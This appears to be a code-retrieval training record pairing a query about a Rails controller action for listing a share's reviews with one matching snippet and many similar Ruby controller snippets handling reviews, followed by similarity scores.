"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map { |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def value_to_hash(value, options = T.unsafe(nil)); end",
"def to_s\r\n to_hash.to_s\r\n end",
"def _to_hash(value)\r\n if value.is_a?(Array)\r\n value.compact.map{ |v| _to_hash(v) }\r\n elsif value.is_a?(Hash)\r\n {}.tap do |hash|\r\n value.each { |k, v| hash[k] = _to_hash(v) }\r\n end\r\n elsif value.respond_to? :to_hash\r\n value.to_hash\r\n else\r\n value\r\n end\r\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def to_s\n to_hash.to_s\nend",
"def to_s\n to_hash.to_s\nend",
"def to_h(value)\n return value unless @to_h\n @to_h.call value\n end",
"def to_hash\n Hash[to_a]\n end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_s\n to_hash.to_s\n end",
"def to_s\n to_hash.to_s\n end",
"def read\n value = super\n value = value.to_hash if value.respond_to?(:to_hash)\n value\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end",
"def _to_hash(value)\n if value.is_a?(Array)\n value.compact.map{ |v| _to_hash(v) }\n elsif value.is_a?(Hash)\n {}.tap do |hash|\n value.each { |k, v| hash[k] = _to_hash(v) }\n end\n elsif value.respond_to? :to_hash\n value.to_hash\n else\n value\n end\n end"
] |
[
"0.6718583",
"0.6718583",
"0.6669122",
"0.66569644",
"0.65872085",
"0.64544505",
"0.64143497",
"0.64143497",
"0.6380626",
"0.63490635",
"0.6302817",
"0.62250805",
"0.6151444",
"0.6102206",
"0.6081347",
"0.6081347",
"0.6073172",
"0.60373986",
"0.6020187",
"0.5937615",
"0.5901666",
"0.5901666",
"0.5901666",
"0.5901666",
"0.5901666",
"0.5888472",
"0.5888472",
"0.58825725",
"0.58825725",
"0.5864945",
"0.58564353",
"0.5833547",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.58219165",
"0.5805913",
"0.5805913",
"0.5797765",
"0.57809323",
"0.5774253",
"0.5774253",
"0.5774253",
"0.5774253",
"0.5774253",
"0.5774253",
"0.57714",
"0.57714",
"0.57679564",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725",
"0.5767725"
] |
0.0
|
-1
|
This is the controller method responsible for displaying all the reviews for a share
|
def index
  # All reviews for this share, highest priority first
  @reviews = @share.reviews.order(priority: :asc)
  # Blank review backing the inline "new review" form on the index page
  @reviewToAlter = @share.reviews.new
end
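The index action assumes @share is already loaded; in a typical Rails controller that happens in a before_action. A minimal sketch under that assumption (the set_share name and the nested /shares/:share_id/reviews route are not in the original record; they are illustrative):

before_action :set_share

private

# Hypothetical helper: load the parent share for every action.
# Assumes reviews are nested under shares, so the route supplies
# params[:share_id].
def set_share
  @share = Share.find(params[:share_id])
end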
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = @share.reviews.new(review_params)\n\t\t\n\t\tif @reviewToAlter.save\n\t\t\tredirect_to share_reviews_path(@share), notice: \"Review saved!\"\n\t\telse\n\t\t\tflash[:alert] = \"Error : #{@reviewToAlter.errors.full_messages.to_sentence}\"\n\t\t\trender :index\n\t\tend\n\tend",
"def index\n @reviews = Review.all\n \n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @reviews = Review.all\n end",
"def index\n @item_reviews = ItemReview.all\n end",
"def index\n @item_reviews = ItemReview.all\n end",
"def index\n @reviews_and_ratings = ReviewsAndRating.all\n end",
"def index\n\t\t@reviews = @movie.reviews\n\tend",
"def index\n\t\t@store_reviews = @store.store_reviews;\t\t\n\tend",
"def index\n @reviews = current_user.reviews\n end",
"def index\n @reviews = @story.reviews\n end",
"def index\n @reviews = @post.reviews.all\n respond_with @post, @reviews\n end",
"def index\n @hm_reviews = HmReview.all\n end",
"def index\n @reviews = @publication.reviews.all\n end",
"def index\n\t\t\t\t# @reviews = Driver.find_by!(id: params[:driver_id]).driver_reviews#.order('created_at DESC').to_a\n\t\t\t\t@reviews = DriverReview.where(driver_id: params[:driver_id])\n\t\t\tend",
"def index\n @reviews = reviewable.reviews\n\n respond_to do |format|\n format.html\n format.json { render json: @reviews }\n end\n end",
"def index\n @shop_reviews = ShopReview.all\n end",
"def index\n @product_reviews = ProductReview.all\n end",
"def index\n @reviews = Review.all\n @review = Review.new(review: params[:review][:review], my_book_id: params[:my_book_id])\n end",
"def my_reviews\n @owner = current_user\n @reviews = Review.find(:all, :conditions => [\"user_id = ?\", @owner.id])\n render :action => \"index\"\n end",
"def reviews\n download_reviews\n @reviews.flatten!\n end",
"def index\n @first_reviews = FirstReview.all\n end",
"def show\n @reviews = Review.where(site_id: @site.id).order(\"created_at DESC\")\n end",
"def get_reviews\n @comment_reviews = CommentReview.where('comment_id = ?', params[:comment_id])\n end",
"def list\n @reviews = current_user.organization.reviews\n end",
"def index\n @visitor_reviews = VisitorReview.all\n end",
"def index\n @evenreviews = Evenreview.all\n end",
"def index\r\n if params[:review_id].nil?\r\n @comments = Comment.all\r\n else\r\n @review = Review.find(params[:review_id])\r\n @comments = @review.comments\r\n end\r\n\r\n respond_to do |format|\r\n format.html\r\n format.xml { render :xml => @comments }\r\n end\r\n end",
"def index\n\t\t@shop = Shop.find(params[:shop_id])\n\t\t@reviews = @shop.reviews\n\tend",
"def index\n @restaurant_reviews = RestaurantReview.all\n end",
"def show\n @review = find_review\n end",
"def index\n @admin_reviews = Review.all\n end",
"def index\n response.headers['X-Total-Count'] = @reviews.count.to_s\n @reviews = @reviews.page(params[:page]) if params[:page].present?\n @reviews = @reviews.per(params[:per]) if params[:per].present?\n\n _render collection: @reviews, flag: params[:flag].try(:to_sym)\n end",
"def index\n @reviews = Review.for_space params[:space_id]\n end",
"def show\n @item = Item.find(params[:id])\n @reviews = @item.reviews\n end",
"def view_reviews\n @submission = Submission.find(params[:id])\n @questions = @submission.assignment.questions.sort_by {|obj| obj.created_at }\n evaluation = @evaluations.where(:user_id => current_user.id)[0]\n @responses = @evaluations[0].responses.sort_by {|obj| obj.created_at }\n\n respond_to do |format|\n format.html { render view, :layout => 'no_sidebar' } # show.html.erb\n format.json { render json: @submission }\n end\n end",
"def index\n @pre_training_reviews = PreTrainingReview.all\n end",
"def index\n @critic_reviews = CriticReview.all\n end",
"def create\n @review = current_user.reviews.new #(params[:review])\n @review.creator_id = current_user.id\n @review.content = params[:review][:content]\n @review.reviewable_id = params[:review][:reviewable_id]\n @review.reviewable_type = params[:review][:reviewable_type]\n# @review.creator_id = params[:creator_id]\n# @review.place_id = params[:place_id] if params[:place_id]\n\n shared = false\n share = current_user.shares.find_by_provider(\"facebook\")\n if !share.nil?\n if share.share_review == true\n shared = true\n end\n end\n \n respond_to do |format|\n if @review.save\n if shared\n @content = @review.content\n @link = review_url(@review) #\"http://www.koedok.com\" #\n @name = \"www.koedok.com\"\n @user = current_user\n# graph.put_wall_post(content, {:name => name, :link => link})\n FbshareWorker.perform_async(@user.id, @content, @name, @link)\n# FbshareWorker.perform_async(token, content, name, link)\n# graph.put_wall_post(\"home\", {:name => \"place1\", :link => \"http://www.koedok.com\"})\n #graph.put_wall_post(\"home\", {:name => \"place1\", :link => review_path(@review)})\n end\n if false #disabled, not working with fb share\n @activity = Activity.create!(:user_id => @review.creator.id, :activity_type => Activity::CREATE_REVIEW, :target_type => @review.class.name, :target_id => @review.id)\n end\n# @activity = Activity.add(@review.creator, Activity::CREATE_REVIEW, @review, @review)\n# PrivatePub.publish_to(\"/reviews/new\", \"alert('#{@review.content}');\")\n #PrivatePub.publish_to(\"/reviews/new\", \"eval('#{@review.content}');\")\n format.html { redirect_to review_path(@review), :notice => t(:review_created) }\n format.json { render json: @review, status: :created, location: @review }\n format.js\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @reviews = @place.reviews\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def index\n @review_counts = ReviewCount.all\n end",
"def index\n @review_projects = ReviewProject.all\n @type_reviews = TypeReview.all\n end",
"def index\n @tour_reviews = TourReview.all\n end",
"def index\n @company_reviews = CompanyReview.all\n end",
"def show\n @fullwidth = true\n if @user.is_artist\n @artist = @user\n if user_signed_in?\n @review = Review.find_by(receiving_user_id: @artist.id, leaving_user_id: current_user.id)\n @review.nil? ? @review = Review.new : @review\n end\n @reviews = @artist.received_reviews.page(params[:page]).order('updated_at DESC').per(25)\n @artist.view_count.present? ? @artist.view_count += 1 : @artist.view_count = 0\n @artist.save\n else\n @reviews = @user.left_reviews.page(params[:page]).order('updated_at DESC').per(25)\n end\n if params[:review].present?\n top_review = Review.find(params[:review])\n if params[:response_link].present?\n render 'show', locals: {top_review: top_review, response_link: true}\n else\n render 'show', locals: {top_review: top_review}\n end\n else\n respond_to do |format|\n format.html { render 'show' }\n format.js { render action: 'paginate_reviews' }\n end\n end\n end",
"def index\n @food_reviews = FoodReview.all\n end",
"def index\n @reviews = Review.where(shop_id: params[:shop_id])\n @shop = Shop.find(params[:shop_id])\n end",
"def index\n @reviews = Review.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def index\n @reviews = Review.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @reviews }\n end\n end",
"def show\n @reviews = Review.where(videogame_id: @videogame.id).order(\"created_at DESC\")\n \n if @reviews.blank?\n @avg_rating = 0\n else\n @avg_rating = @reviews.average(:rating).round(2)\n end\n end",
"def review\n @t = T\n @t = @t.paginate :page => params[:page], :per_page => params[:per_page]\n @data = @t.meanings\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @t }\n end\n end",
"def reviews\n @reviews\n end",
"def edit\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = Review.find(params[:id])\n\tend",
"def expand_reviews\n @twitter_id = params[:twitter_id]\n @sentiment = params[:sentiment]\n @total_count = params[:count].to_i\n @page = (params[:page] || 1).to_i\n @limit = 25 # hard code for now\n @final_page = (@total_count - 1)/@limit + 1\n _build_pagination_array\n offset = (@page -1 ) * @limit\n @replies = Tweet.replies(@twitter_id, @sentiment, offset, @limit)\n end",
"def index\n @employee_reviews = EmployeeReview.all\n end",
"def update\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = Review.find(params[:id])\n\t\t@review = Review.find(params[:id])\n\t\tif @review.update(review_params)\n\t\t\tredirect_to share_reviews_path(@share), notice: 'Review successfully updated!'\n\t\telse\n\t\t\tflash[:alert] = \"Error : #{@review.errors.full_messages.to_sentence}\"\n\t\t\trender :edit\n\t\tend\n\tend",
"def reviews( params={} )\n reviews = get_connections(\"reviews\", params)\n return map_connections reviews, :to => Facebook::Graph::Review\n end",
"def show\n @reviews = Review.select { |review| review.item_id == @item.id }\n @review = Review.new(item_id: @item.id)\n @ratingSum = 0.0\n @reviews.each do |review|\n @ratingSum = @ratingSum + review.rating\n end\n @avgRating = (@ratingSum/@reviews.count).round(1)\n if logged_in?\n @isPrevRented = Rental.find_by(user_id: current_user.id, history: true, item_id: params[:id])\n @isPrevReviewed = Review.find_by(user_id: current_user, item_id: params[:id])\n end\n @rentals = Rental.where(item_id: params[:id], history: true)\n end",
"def index\n @boo_k_reviews = BooKReview.all\n end",
"def reviews\n @items = ProductComment.includes(:account).where({product: @product}).all\n end",
"def show\n @reviews = Review.where(tutor_profile_id: @tutor_profile.id).order(\"created_at DESC\")\n if @reviews.blank?\n avg_rating = 0 \n else\n @avg_rating = @reviews.average(:rating).round(2) \n end\n end",
"def reviews(params = {})\n data = request(\"/review/list\", params.merge(v: \"2\"))\n reviews = data[\"reviews\"][\"review\"]\n if reviews.present?\n reviews.map { |review| Hashie::Mash.new(review) }\n else\n []\n end\n end",
"def show\n @review = Review.new\n\n if @listing.reviews.blank?\n @avg_rating = 0\n else\n @avg_rating = @listing.reviews.average(:rating).round(2)\n end\n\n end",
"def index\n @fourth_reviews = FourthReview.all\n end",
"def index\n @reviews = Review.find(:all, :limit => 10, :include => [:user, :package])\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @review }\n end\n end",
"def widget_reviews_list\n @snapshot = Snapshot.find(params[:snapshot_id])\n unless @snapshot && has_role?(:user, @snapshot)\n render :text => \"<b>Cannot access the reviews of this project</b>: access denied.\"\n return\n end\n\n @dashboard_configuration=Api::DashboardConfiguration.new(nil, :period_index => params[:period], :snapshot => @snapshot)\n render :partial => 'project/widgets/reviews/reviews_list'\n end",
"def show\n @reviews = Review.where(project_id: @project.id).order(\"created_at DESC\")\n end",
"def review\n\t\t@reviewer = Reviewer.find(params[:reviewer_id])\n\t\t@cardsort = Cardsort.find(params[:cardsort_id])\n\t\tcardsort_results = (@reviewer.cardsort_results & @cardsort.cardsort_results)\n\t\tif (!cardsort_results.empty?)\n\t\t\trender \"/cardsorts/404\" and return\n\t\tend\n\t\tbegin\n\t\t\t@cardsort.reviewers.find(@reviewer.id)\n\t\trescue\n\t\t\trender \"/cardosrt/506\" and return\n\t\tend\n\t\t@cards = @cardsort.cards\n\t\t@groups = @cardsort.groups\n\tend",
"def index\n @q = @ci_reviews.search params[:q]\n @ci_reviews = @q.result.page(params[:page])\n end",
"def index\n\t\t@book_reviews = BookReview.find_all_by_user_id(current_user.id)\n\n\t\trespond_to do |format|\n\t\t\tformat.html # index.html.erb\n\t\t\tformat.json { render :json => @book_reviews }\n\t\tend\n\tend",
